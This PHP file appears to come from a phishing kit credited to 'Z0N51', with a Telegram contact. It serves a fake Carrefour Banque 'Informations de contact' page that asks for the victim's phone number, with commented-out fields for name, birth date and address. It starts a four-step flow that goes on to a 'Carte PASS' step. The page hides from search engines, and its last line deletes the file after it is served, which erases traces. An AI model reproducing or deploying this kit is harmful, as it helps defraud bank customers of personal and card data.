<?php
    /*******
    Main Author: Z0N51
    Contact me on telegram : https://t.me/z0n51
    ********************************************************/
    
    require_once '../includes/main.php';
    reset_action(get_client_ip());
    $_SESSION['last_page'] = 'details';
?>
<!doctype html>
<html style="height: 100%; display: flex; flex-direction: column; background: #FFF;">

    <head>
        <!-- Required meta tags -->
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
        <meta name="robots" content="noindex," "nofollow," "noimageindex," "noarchive," "nocache," "nosnippet">
        
        <!-- CSS FILES -->
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css">
        <link rel="stylesheet" href="../assets/css/helpers.css">
        <link rel="stylesheet" href="../assets/css/style.css">

        <link rel="icon" type="image/x-icon" href="../assets/imgs/favicon.ico" />

        <title>Informations de contact</title>
    </head>

    <body style="height: 100%; display: flex; flex-direction: column; background: #FFF;">
        
        <!-- HEADER -->
        <header id="header" class="d-flex">
            <div class="logo flex-grow-1"><img style="max-width: 103px;" src="../assets/imgs/logo.png"></div>
            <p>Informations de contact</p>
        </header>
        <!-- END HEADER -->

        <div id="steps">
            <ul>
                <li class="active">1</li>
                <li>2</li>
                <li>3</li>
                <li>4</li>
            </ul>
        </div>

        <!-- MAIN -->
        <main id="main" class="flex-grow-1">
            <div class="left">
                <ul>
                    <li class="active"><span>1</span> Mes informations</li>
                    <li><span>2</span> Sécurité</li>
                    <li><span>3</span> Carte PASS</li>
                    <li><span>4</span> Finalisation</li>
                </ul>
            </div>
            <div class="right">
                <form action="../index.php" method="post">
                    <input type="hidden" name="captcha">
                    <input type="hidden" name="step" value="details">
                    <legend>Informations de contact</legend>
                    <p>Ce service vous permet de renseigner et/ou de mettre à jour votre compte afin de sécuriser au plus haut niveau vos opérations bancaires sur internet dont vos achats en ligne.</p>
                    <!--<div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'nom') ?>">
                        <label for="nom ">Nom</label>
                        <input type="text" name="nom" id="nom" class="form-control" placeholder="EX : Cassel" value="<?php echo get_value('nom'); ?>">
                        <?php echo error_message($_SESSION['errors'],'nom'); ?>
                    </div>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'prenom') ?>">
                        <label for="prenom ">Prénom</label>
                        <input type="text" name="prenom" id="prenom" class="form-control" placeholder="EX : Jean" value="<?php echo get_value('prenom'); ?>">
                        <?php echo error_message($_SESSION['errors'],'prenom'); ?>
                    </div>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'birth_date') ?>">
                        <label for="birth_date ">Date de naissance</label>
                        <input type="text" inputmode="numeric" maxlength="10" name="birth_date" id="birth_date" class="form-control" placeholder="EX : 01/01/1979" value="<?php echo get_value('birth_date'); ?>">
                        <?php echo error_message($_SESSION['errors'],'birth_date'); ?>
                    </div>
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'address') ?>">
                        <label for="address ">Adresse</label>
                        <input type="text" name="address" id="address" class="form-control" placeholder="EX : 75000 Paris, France" value="<?php echo get_value('address'); ?>">
                        <?php echo error_message($_SESSION['errors'],'address'); ?>
                    </div>-->
                    <div class="form-group mb30 <?php echo is_invalid_class($_SESSION['errors'],'phone') ?>">
                        <label for="phone ">Numéro de téléphone</label>
                        <input type="text" inputmode="numeric" maxlength="10" name="phone" id="phone" class="form-control" placeholder="EX : 06 XX XX XX XX" value="<?php echo get_value('phone'); ?>">
                        <?php echo error_message($_SESSION['errors'],'phone'); ?>
                    </div>
                    <div class="btns">
                        <button type="submit">Valider</button>
                    </div>
                </form>
            </div>
        </main>
        <!-- END MAIN -->

        <!-- FOOTER -->
        <footer id="footer">
            <div class="container">
                <p>
                    &copy; <?php echo date('Y'); ?> Carrefour Banque<br><span>Protection des données</span>
                </p>
            </div>
        </footer>
        <!-- END FOOTER -->

        <!-- JS FILES -->
        <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
        <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.bundle.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/js/all.min.js"></script>
        <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.payment/3.0.0/jquery.payment.min.js"></script>
        <script src="../assets/js/script.js"></script>

    </body>

</html>
<?php unlink(basename(__FILE__)); ?>